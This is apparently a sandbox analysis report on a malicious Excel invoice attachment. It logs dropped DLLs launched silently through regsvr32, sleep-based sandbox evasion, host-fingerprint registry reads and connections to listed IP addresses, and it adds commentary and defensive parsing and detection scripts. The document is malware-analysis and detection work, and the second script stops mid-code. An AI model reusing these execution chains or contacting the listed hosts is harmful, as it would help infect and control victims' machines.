Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE summary subject = by C.H. Robinson
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE indicators vbamacros = False
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key enumerated: More than 470 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1796 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -263000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -137000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -243000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -399000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -650000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -304000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -468000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -321000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -141000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -309000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724 | Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456 | Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -152000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -522000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -588000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -127000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -318000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -263000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -313000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -343000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -126000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -345000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -311000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3068Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1036Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -136000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
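The sleep list above is easier to reason about per thread than per line. The script below is an added example, not part of the Joe Sandbox report: it parses lines in exactly the form printed above (including the missing space in "2724Thread"), groups them by thread id, and flags threads whose cumulative requested delay would outlast a sandbox run. The sample lines are a constructed subset of the report's own list. One assumption is stated in the code: the number the sandbox prints as "-159000s" is treated as a raw millisecond delay argument, so -159000 is read as 159 seconds.

```python
"""Aggregate sandbox 'Thread sleep' evasion lines per thread.

Added example for this report; it is not Joe Sandbox code. SAMPLE_LINES is a
constructed subset of the report's sleep list. Assumption: the number printed
as '-159000s' is the raw delay argument in milliseconds (Sleep /
NtDelayExecution), so -159000 means 159 seconds; the '-30000s' on the right of
each line is the sandbox's own alert threshold.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The extracted report prints 'TID: 2724Thread sleep time' with no space,
# so the separator is optional whitespace.
SLEEP_TIME = re.compile(
    r"^Source: (?P<image>\S+) TID: (?P<tid>\d+)\s*Thread sleep time: "
    r"-(?P<ms>\d+)s >= -(?P<threshold>\d+)s$"
)
SLEEP_COUNT = re.compile(
    r"^Source: (?P<image>\S+) TID: (?P<tid>\d+)\s*Thread sleep count: "
    r"(?P<count>\d+) > (?P<threshold>\d+)$"
)

SAMPLE_LINES = [  # constructed subset of the report's lines
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -159000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -138000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -290000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -650000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep count: 65 > 30",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812Thread sleep time: -300000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -426000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed",
]


@dataclass
class ThreadStats:
    image: str
    delays_ms: List[int] = field(default_factory=list)
    reported_count: Optional[int] = None  # from a 'sleep count: N > M' line

    @property
    def total_s(self) -> float:
        return sum(self.delays_ms) / 1000.0

    @property
    def longest_s(self) -> float:
        return max(self.delays_ms, default=0) / 1000.0


def parse(lines) -> Dict[str, ThreadStats]:
    """Group every sleep-time and sleep-count line by thread id."""
    stats: Dict[str, ThreadStats] = {}
    for raw in lines:
        line = raw.strip()
        m = SLEEP_TIME.match(line)
        if m:
            stats.setdefault(m["tid"], ThreadStats(m["image"])).delays_ms.append(int(m["ms"]))
            continue
        m = SLEEP_COUNT.match(line)
        if m:
            stats.setdefault(m["tid"], ThreadStats(m["image"])).reported_count = int(m["count"])
        # anything else ('Last function: Thread delayed', blank lines) is ignored
    return stats


def evasive_threads(stats: Dict[str, ThreadStats], min_total_s: float = 600.0) -> List[str]:
    """Thread ids whose cumulative requested delay is at least min_total_s.

    A thread that asks for more cumulative sleep than a sandbox run lasts would
    never reach its next stage if the sandbox honoured the delays. The
    10-minute default is an assumption chosen to match typical run lengths.
    """
    return sorted(tid for tid, s in stats.items() if s.total_s >= min_total_s)


def summary(stats: Dict[str, ThreadStats]) -> List[str]:
    """One line per thread, largest cumulative delay first."""
    rows = sorted(stats.items(), key=lambda kv: kv[1].total_s, reverse=True)
    return [
        f"TID {tid}: {len(s.delays_ms)} sleeps, total {s.total_s:.0f}s, "
        f"longest {s.longest_s:.0f}s"
        + (f", sandbox count {s.reported_count}" if s.reported_count is not None else "")
        for tid, s in rows
    ]


if __name__ == "__main__":
    parsed = parse(SAMPLE_LINES)
    print("\n".join(summary(parsed)))
    print("evasive:", evasive_threads(parsed))
```

Fed the full list above, the same parser gives one row per thread and a per-process picture (one stalling thread plus one single-delay sibling) that the flat line list hides. The threshold is deliberately a parameter: a sandbox that patches sleeps short, as this one evidently did since the run completed, will still record the requested values, so the cumulative figure is a better evasion indicator than any single call.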

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe  Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe  Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe  Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe  Network Connect: 194.225.58.214 187

Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll

The -s switch is regsvr32's silent mode (no DllRegisterServer dialog). The three DLLs live in the user's Temp directory and are the PE files the behavior graph shows EXCEL.EXE dropping, so the chain is: macro downloads and writes a DLL, 64-bit regsvr32 is invoked on it, and regsvr32 re-launches its 32-bit SysWOW64 copy to load the 32-bit module. The network connections then come from that SysWOW64 regsvr32, a binary that has no reason to open sockets of its own.

Source: regsvr32.exe memory dumps 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp  Binary or memory strings: Program Manager; Shell_TrayWnd; !Progman

These are the window names and classes of the Windows desktop shell (Progman, the taskbar). The sandbox reports them as a possible check for an interactive desktop, but the same strings occur in mapped system libraries, so on their own they are weak evidence.

Source: C:\Windows\SysWOW64\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe  Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

InstallDate and MachineGuid are stable per-installation values and are the usual inputs for a host fingerprint or bot identifier; the report does not show what the value is used for. The AuthRoot write can be a side effect of Windows' automatic root-certificate update while validating the TLS chains of the connections above, so treat it as corroborating rather than as evidence of a planted certificate.
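The process and network events above are the part of this report that transfers directly to endpoint detection. The script below is an added example, not Joe Sandbox code or a rule shipped by any product: it evaluates a small set of constructed telemetry records (an assumed process-creation and network-connection schema modelled on what Sysmon or an EDR emits) against three rules taken from this page, regsvr32 silently loading a DLL from a user-writable path, regsvr32 spawning regsvr32, and regsvr32 making outbound connections, with non-HTTP(S) ports escalated. The event values are copied from the report plus one benign control.

```python
"""Flag the regsvr32 pattern from this report in endpoint telemetry.

Added example, not Joe Sandbox code. Events are dicts in an assumed schema
(constructed here) for process-creation and network-connection records; the
values come from the report above plus one benign control (pid 4321).
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Locations an unprivileged user can write to; a DLL registered from here
# is far more suspicious than one under Program Files or System32.
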